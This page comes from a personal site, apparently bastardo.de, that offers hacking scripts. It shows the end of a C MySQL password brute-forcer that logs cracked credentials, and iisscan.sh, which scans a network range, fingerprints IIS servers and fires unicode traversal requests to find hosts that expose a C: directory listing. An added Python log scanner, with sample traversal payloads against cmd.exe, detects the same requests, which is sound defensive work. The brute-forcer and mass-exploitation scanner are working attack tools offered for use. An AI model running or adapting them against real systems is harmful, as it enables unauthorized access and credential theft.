    if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0)  == NULL)
	{
	    move(6,2);
	    deleteln();
	    mvprintw(6,2,"Pass: %s",buffer);
	    refresh();
	}
	else
	    {
		move(6,2);
		deleteln();
		mvprintw(6,2,"Pass: %s",buffer);
		refresh();
#if ENG && !GER
		mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,buffer,host);
#else
		mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,buffer,host);
#endif
		refresh();
		endwin();
		mysql_close(my);
		fprintf(logfile,"%s:%s@%s\r\n",user,buffer,host);
		return 0;
	    }
next:
dummy=1;
}

    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}

 

 

IISscan shell script

IIS Scanner

You can also find this script at http://packetstormsecurity.com/

head.cmd

HEAD / HTTP/1.0

iisscan.sh

#!/bin/sh
# A Simple IIS network scanner
# ./iisscan.sh 10.*.54.3-23 output
# http://www.bastardo.de(Apache) ;)
clear
if [ $# -ne 2 ]
    then
	echo "$0 [ip room] [outputfile]" >&2
	exit 0
	else
	    echo "Written by cd ;)"
	    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.o";exit 1
	    echo "Scan started against to $1 on port 80"

	echo "This can take a while"
	nmap -T Aggressive -v -v -sS $1 -p 80 -oG $1.out | grep Host
	cat $1.out | grep open | cut '-d ' -f 2 > $2
	fi
rm $1.out
sum=0
g=`cat $2 | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of any http server!!!

      Thanks for use ..."
	rm $2
	exit 1
    fi

echo "Please wait... 
      Testing server versions"
    while read host ;
	do 
	     echo "         Get http server version from: $host"
	    netcat -w 5 $host 80 < head.cmd | grep "^Server: " | sed "s/^Server:/$host/" | grep "IIS" >>hosts.$1.tmp
	done < $2
sum=0
g=`cat hosts.$1.tmp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of IIS 

      Thanks for use ..."
	rm hosts.$1.tmp
	rm $2
	exit 1
    fi
rm $2
cat hosts.$1.tmp | cut '-d ' -f 1 > $2
rm hosts.$1.tmp
touch $2.exp
while read host;
 do 
 echo "Try to Exploit $host"
 while read unicodes;
 do
 echo "$unicodes" | netcat -w 10 $host 80 | grep 'Directory of c:' >fluff
 sum=0
    g=`cat fluff | wc -c`
    sum=`expr $sum + $g`
    if [ $sum = 0 ]
	then 
	    echo "try $unicodes"
	    else 
		echo "$host is Exploitable with $unicodes"
		echo $host >>$2.exp
    fi
    done < unicodes.txt
 done < $2
rm fluff
sum=0
g=`cat $2.exp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
	rm $2.exp
echo "
      No matches of Exploitable IIS
      In  >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "
	exit 1
    fi
echo "

      You can find a list of Exploitable IIS in >> $2.exp << 
      and in >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "

An old list of unicode request strings: unicodes.txt (the input file iisscan.sh reads)


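As an added example that is not part of the original post, a defender-side check for the same requests iisscan.sh sends: it decodes each logged URI the way the faulty IIS decoder did (a second percent-decoding pass for %255c and %%35%63 style double encoding, then overlong UTF-8 such as %c0%af and %c1%1c collapsing to / and \) and flags requests that walk out of the virtual directory to cmd.exe or root.exe. The log lines are constructed, W3C-style with the fields c-ip cs-method cs-uri-stem cs-uri-query sc-status; the lenient decoder is my reconstruction for detection purposes, not the original IIS code.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed IIS-style log excerpt (sample data, not from the original post);
# fields: c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: c-ip cs-method cs-uri-stem cs-uri-query sc-status
10.0.0.5 GET /default.htm - 200
10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
10.0.0.9 GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 404
10.0.0.9 GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe /c+dir 500
10.0.0.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
10.0.0.12 GET /images/logo%20v2.gif - 200
10.0.0.12 HEAD / - 200
"""

# UTF-8 lead bytes for 2..6 byte sequences: (low, high, continuation bytes, payload mask)
_LEAD_BYTES = [
    (0xC0, 0xE0, 1, 0x1F),
    (0xE0, 0xF0, 2, 0x0F),
    (0xF0, 0xF8, 3, 0x07),
    (0xF8, 0xFC, 4, 0x03),
    (0xFC, 0xFE, 5, 0x01),
]

TRAVERSAL = re.compile(r"\.\.[\\/]")
TARGET = re.compile(r"(cmd|root)\.exe", re.IGNORECASE)


def lenient_utf8(raw):
    """Decode like the faulty decoder: overlong sequences are accepted and
    continuation bytes are not checked, so C0 AF becomes '/' and C1 1C
    becomes '\\'. Sequences that do not collapse to ASCII are left as-is."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        for low, high, ncont, mask in _LEAD_BYTES:
            if low <= b < high and i + ncont < len(raw):
                cp = b & mask
                for c in raw[i + 1:i + 1 + ncont]:
                    cp = (cp << 6) | (c & 0x3F)
                if cp < 0x80:
                    out.append(cp)
                    i += 1 + ncont
                    break
        else:
            out.append(b)
            i += 1
    return bytes(out)


def normalize_uri(uri):
    """Percent-decode twice (catches %255c and %%35%63 style double encoding),
    then apply the lenient UTF-8 decoding. Returns
    (normalized path, was double encoded, contained overlong UTF-8)."""
    once = unquote_to_bytes(uri)
    twice = unquote_to_bytes(once)
    decoded = lenient_utf8(twice)
    return decoded.decode("latin-1"), twice != once, decoded != twice


def is_traversal_attempt(path):
    """True when the decoded path walks up with ../ or ..\\ to cmd.exe/root.exe."""
    return bool(TRAVERSAL.search(path)) and bool(TARGET.search(path))


def scan_log(text):
    """One finding per request that normalizes to a traversal to a shell."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ip, method, stem, query, status = line.split(" ", 4)
        path, double_encoded, overlong = normalize_uri(stem)
        if is_traversal_attempt(path):
            findings.append({
                "ip": ip, "method": method, "status": status, "uri": stem,
                "normalized": path,
                "double_encoded": double_encoded, "overlong_utf8": overlong,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        why = "double-encoded" if f["double_encoded"] else "overlong UTF-8"
        print(f'{f["ip"]:10s} {f["status"]} {why:15s} {f["uri"]} -> {f["normalized"]}')
```

A 404 or 500 in the status column still counts: the request is the indicator, not whether it succeeded.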
 

Home

Hello and welcome to bastardo.de

I have changed the design a little bit towards a blog; it is easier to maintain.

However 😉 you can find source code here and, maybe in the future, some information about the little scripts I wrote, as well as some tips for administration.
I hope you enjoy this site and have fun with my programs; if you find a code error, don't hesitate to write a comment.

At the moment I list:
MySQL Bruteforce for Linux and Windows
IISscan for Linux (written in early 2000 for testing purposes)
SmbScan for Linux (Samba/Netbios scanner for large networks, to find free shares in the local network)

You can also find information about programming on my partner site http://code-reference.com, a library about programming.